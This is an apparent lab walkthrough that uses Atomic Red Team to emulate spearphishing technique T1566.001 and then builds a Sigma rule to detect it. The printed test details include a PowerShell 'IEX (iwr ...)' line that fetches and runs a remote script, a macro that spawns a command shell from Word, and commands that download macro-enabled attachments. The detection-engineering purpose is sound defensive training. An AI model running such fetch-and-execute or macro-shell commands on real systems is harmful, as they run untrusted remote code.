Table of Contents
Cyber Attacks and the Kill Chain
Cyberattacks follow a predictable process, the Unified Cyber Kill Chain. Ideally, blue teams would stop attacks during reconnaissance. However, this is impossible.The goal is therefore to implement detection across all phases of the kill chain, creating redundancy. Even if one phase is missed, detection in a later phase ensures the attacker is identified before achieving their objective.
MITRE ATT&CK
MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
The MITRE ATT&CK framework catalogs real-world tactics, techniques, and procedures (TTPs) used by threat actors throughout the cyber kill chain. It provides a navigator tool for investigating these TTPs (_Tactics, Techniques and Procedures)
NOTE
The framework mainly addresses TTPs theoretically, making it difficult to test or address specific gaps. Atomics provide practical methods to identify and close these gaps effectively.
Atomic Red
The Atomic Red Team library offers red team test cases aligned with the MITRE ATT&CK framework. These simple test cases help blue teams identify and address detection gaps. They can be executed manually or automated for streamlined testing.
Practical
McSkidy suspects that the supposed attacker used the MITRE ATT&CK technique T1566.001 Spearphishing with an attachment. Let’s recreate the attack emulation performed by the supposed attacker and then look for the artefacts created.
Here are some parameters that we need in this walkthrough
| Parameter | Explanation | Example Use |
|---|---|---|
-AtomicTechnique | Defines the technique to emulate. Use the full technique name or “TXXXX” value. | Invoke-AtomicTest -AtomicTechnique T1566.001 |
-ShowDetails | Shows the details of each test included in the Atomic. | Invoke-AtomicTest T1566.001 -ShowDetails |
-ShowDetailsBrief | Shows the title of each test included in the Atomic. | Invoke-AtomicTest T1566.001 -ShowDetailsBrief |
-CheckPrereqs | Checks if all necessary components are present for testing. | Invoke-AtomicTest T1566.001 -CheckPrereqs |
-TestNames | Executes tests using the complete Atomic Test Name. | Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing Attachment" |
-TestGuids | Executes tests using the unique test identifier. | Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306 |
-TestNumbers | Executes tests using the test number (limited to the Atomic Technique scope). | Invoke-AtomicTest T1566.001 -TestNumbers 2,3 |
-Cleanup | Runs cleanup commands to revert machine state to normal. | Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup |
To get this information, we must include the name of the technique we want information about and then add the flag -ShowDetails to our command. Let’s have a look at the command we constructed: Invoke-AtomicTest T1566.001 -ShowDetails. This command displays the details of all tests included in the T1566.001 Atomic.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Loading personal and system profiles took 631ms.
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -ShowDetails
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Download Macro-Enabled Phishing Attachment
Atomic Test Number: 1
Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating
an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" and PhishingAttachment.txt
are downloaded to the %temp% directory.
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$url = 'http://localhost/PhishingAttachment.xlsm'
$url2 = 'http://localhost/PhishingAttachment.txt'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
Invoke-WebRequest -Uri $url2 -OutFile $env:TEMP\PhishingAttachment.txt
Cleanup Commands:
Command:
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
Remove-Item $env:TEMP\PhishingAttachment.txt -ErrorAction Ignore
[!!!!!!!!END TEST!!!!!!!]
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Word spawned a command shell and used an IP address in the command line
Atomic Test Number: 2
Atomic Test GUID: cbb6799a-425c-4f83-9194-5447a909d67f
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indiciat
or of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
Command (with inputs):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
Cleanup Commands:
Command:
Remove-Item #{jse_path} -ErrorAction Ignore
Command (with inputs):
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore
Dependencies:
Description: Microsoft Word must be installed
Check Prereq Command:
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Check Prereq Command (with inputs):
try {
New-Object -COMObject "Word.Application" | Out-Null
$process = "Word"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Get Prereq Command:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Get Prereq Command (with inputs):
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
[!!!!!!!!END TEST!!!!!!!]
Phishing: Spearphishing Attachment T1566.001 Emulated
Let’s continue and run the first test of T1566.001. Before running the emulation, we should ensure that all required resources are in place to conduct it successfully. To verify this, we can add the flag -Checkprereq to our command. The command should look something like this: Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq.
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
CheckPrereq's for: T1566.001-1 Download Macro-Enabled Phishing Attachment
Prerequisites met: T1566.001-1 Download Macro-Enabled Phishing AttachmentNow that we have verified the dependencies, let us continue with the emulation. Execute the following command to start the emulation: Invoke-AtomicTest T1566.001 -TestNumbers 1 and you should get the following output
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing AttachmentBased on the output, we can determine that the test was successfully executed. We can now analyse the logs in theWindows Event Viewer to find Indicators of Attack and Compromise.
Alerting on the Atomic
In the previous paragraph, we found multiple indicators of compromise through the Sysmon event log. We can use this information to create detection rules to include in our EDR, SIEM, IDS, etc. These tools offer functionalities that allow us to import custom detection rules. There are several detection rule formats, including Yara, Sigma, Snort, and more. Let’s look at how we can implement the artefacts related to T1566.001 to create a custom Sigma rule.
Two events contained possible indicators of compromise. Let’s focus on the event that contained the Invoke-WebRequest command line:
"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}"
We can use multiple parts of this artefact to include in our custom Sigma rule.
-
Invoke-WebRequest: It is not common for this command to run from a script behind the scenes. -
$url = 'http://localhost/PhishingAttachment.xlsm': Attackers often use a specific malicious domain to host their payloads. Including the malicious URL in the Sigma rule could help us detect that specific URL. -
PhishingAttachment.xlsm: This is the malicious payload downloaded and saved on our system. We can include its name in the Sigma rule as well.
Combining all these pieces of information in a Sigma rule would look something like this:
title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 1
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
category: process_creation
product: windows
service: sysmon
detection:
selection_invoke_webrequest:
EventID: 1
CommandLine|contains:
- 'Invoke-WebRequest'
- 'http://localhost/PhishingAttachment.xlsm'
selection_file_creation:
EventID: 11 # Sysmon Event ID for File Creation
TargetFilename|endswith: '\PhishingAttachment.xlsm'
condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
- Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
- attack.t1071.001 # Web Service - Application Layer Protocol
- attack.t1059.001 # PowerShell
- attack.t1105 # Ingress Tool Transfer
- attack.t1566.001 # Spearphishing AttachmentThe detection part is where the effective detection is happening. We can see clearly the artefacts that we discovered during the emulation test. We can then import this rule into the main tools we use for alerts, such as the EDR, SIEM, XDR, and many more.